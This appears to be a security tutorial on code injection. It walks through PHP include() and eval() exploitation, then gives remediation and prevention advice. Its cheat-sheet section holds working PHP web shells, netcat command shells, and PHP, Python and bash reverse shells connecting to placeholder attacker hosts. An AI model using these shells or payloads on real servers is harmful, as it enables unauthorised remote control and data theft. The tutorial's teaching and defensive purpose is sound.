Code injection is the general term for attack types that consist of injecting code that is then interpreted/executed by the application. This type of attack takes advantage of mismanagement of untrusted data.
Requirements:
- Domain – A domain for testing
- Programming – High programming skills
Responsibility:
In this tutorial we will use hacking techniques, with the only purpose of learning. We do not promote its use for profit or improper purposes. We are not responsible for any damage or impairment that may be generated in the systems used. The responsibility lies entirely with the user of this tutorial.
Knowledge:
- Linux – High
- Programming – High
- Kali Linux – High
- Windows – Not applicable
- Networks – Bass
Overall Tutorial Level: High
Ideal for: Code Developers, Security Engineers, Pentesters, Security Engineers
What is code injection?
OWASP defines Code Injection as a general term for any type of attack that consists of injecting code that is then interpreted and executed by the application. This type of attack takes advantage of the mishandling of untrusted data. This type of attack is usually possible due to the lack of proper validation of input/output data, such as:
- allowed characters (standard or custom regular expression classes)
- data format
- expected amount of data
Code injection differs from command injection in that an attacker is limited only by the functionality of the injected language itself. If an attacker can inject and execute PHP code into an application, then he is limited only by PHP’s capabilities. Command injection consists of leveraging existing code to execute commands, usually in the context of a shell.
How does it work?
Scenario 1: PHP include() function
In this scenario, the PHP include() function is in use without input validation.
http://vulnerable-site.com/?path=support.php
To exploit the vulnerability, we will store our payload on an external server to call the external file and execute it on the vulnerable server:
http://vulnerable-site.com/?path=http://attacker-website/paylaod.php
Scenario 2: PHP eval() function
In this example, the vulnerable PHP eval() function is used, which provides a quick and convenient way to execute string values as PHP code, especially in the early stages of development or for debugging that will trigger code injection. The source code looks as follows:
<?php eval ("echo ".$_REQUEST["parameter"].";"); ?>
The parameter is passed to the URL as follows:
http://vulnerable-site.com/?parameter=value
An attacker who knows the eval() function in use (it can be revealed through error messages) can send the following payload to exploit the vulnerability:
http://vulnerable-site.com/?parameter=value;phpinfo();
If successful, phpinfo() will be executed after echoing the parameter value and will provide information about the configuration details.
In addition, in case the system() function is also enabled, this may allow the attacker to execute arbitrary commands such as those shown below:
http://vulnerable-site.com/?parameter=value;system('ls -l');
What is the impact of code injection?
In case the malicious code in the user input is processed insecurely, the vulnerability allows code execution. This can lead to arbitrary code execution on the server or execution of system commands on the server, leading to command injection attacks. Depending on the current privileges, the attack may result in obtaining an interactive shell on the vulnerable system.
Code Injection Cheatsheet
# Execute one command <?php system("whoami"); ?> <?php echo shell_exec("nc.exe -nlvp 4444 -C:\Windows\System32\cmd.exe");?> # Take input from the url paramter. shell.php?cmd=whoami <?php system($_GET['cmd']); ?> <?php echo shell_exec($_GET["cmd"]); ?> <? passthru($_GET["cmd"]); ?> php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' <?php $c=$_GET['c']; echo `$c`; ?> # The same but using passthru <?php passthru($_GET['cmd']); ?> # For shell_exec to output the result you need to echo it <?php echo shell_exec("whoami");?> # preg_replace(). This is a cool trick <?php preg_replace('/.*/e', 'system("whoami");', ''); ?> # Using backticks <?php $output = `whoami`; echo "<pre>$output</pre>"; ?> # Using backticks <?php echo `whoami`; ?> # upload nc.php <?php echo system("nc -lvp 81 -e cmd.exe");?> # upload nc.exe # run nc.php on browser
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()
Remediation
To prevent and remedy code injection you can do the following:
- User input validation/sanitization: Data from all potentially untrusted sources must undergo input validation, including not only Internet-facing web clients, but also backend feeds via extranets, from suppliers, partners, vendors or regulators, each of which can be compromised themselves and start sending malformed data.
- Avoid using vulnerable functions in the code: It is also possible to test the code using automated tools to identify insecure functions and possible vulnerabilities.
- PS: Commonly disabled functions for PHP include: exec(), passthru(), shell_exec(), system(), proc_open(), popen(), curl_exec(), curl_multi_exec(), parse_ini_file(), and show_source().
How to avoid code injection?
There are several ways to prevent code injection. Here are some tips to help prevent code injection.
- Examine the application for various escape characters and other special symbols. Make sure that the application only accepts a limited set of values.
- Make sure that eval() code is avoided in the raw input given by users. Only use language-specific features.
- You must know that any data set can have attack code injected into it, so you must treat all data as untrusted. You must know where your data can be manipulated. Code injection is not limited to HTML code and query strings. These code injections can also take place in cookies and data files.
- The next step to prevent code injection is to lock down your interpreter. This is only possible if you have control of the server configuration. The functionality of the interpreter can be limited if you have control. This can be done to limit the functionality to the minimum necessary for your application. This can be explained by example – remove the system() function if your application does not use this function. This can be done by specifying it in the disable_functions directive.
- Several static code checking tools can help you check your code. These tools will help you review your code for any unwanted code and help you validate and sanitize your code.
- There are dynamic web vulnerability scanners that can help you scan your application. These scanners will help you make sure that the applications you use are safe from various online attacks.
Conclusion
The Internet world is full of threats, and there are new types of threats that keep coming to the Internet. And from these threats and cyber-attacks you need to stay away. When you browse the Internet, there may be chances that you are the next target of cyber attack. One such attack is code injection, which affects your connection to the web application and exploits your results. Well, there are several methods to help you avoid this type of cyber attack. The code injection attack may include: java injections, PHP code injections, HTML code injection and javascript injection.
These affect only the particular type of functionality, which is only provided by the particular code. This article discusses the various aspects of code injection. Reading this article will help you learn what code injection is and how it is implemented. This is explained with the example of code injection. This article also explains the various methods to help prevent code injections, and how dangerous it can be to your system and data.
I hope you find it helpful.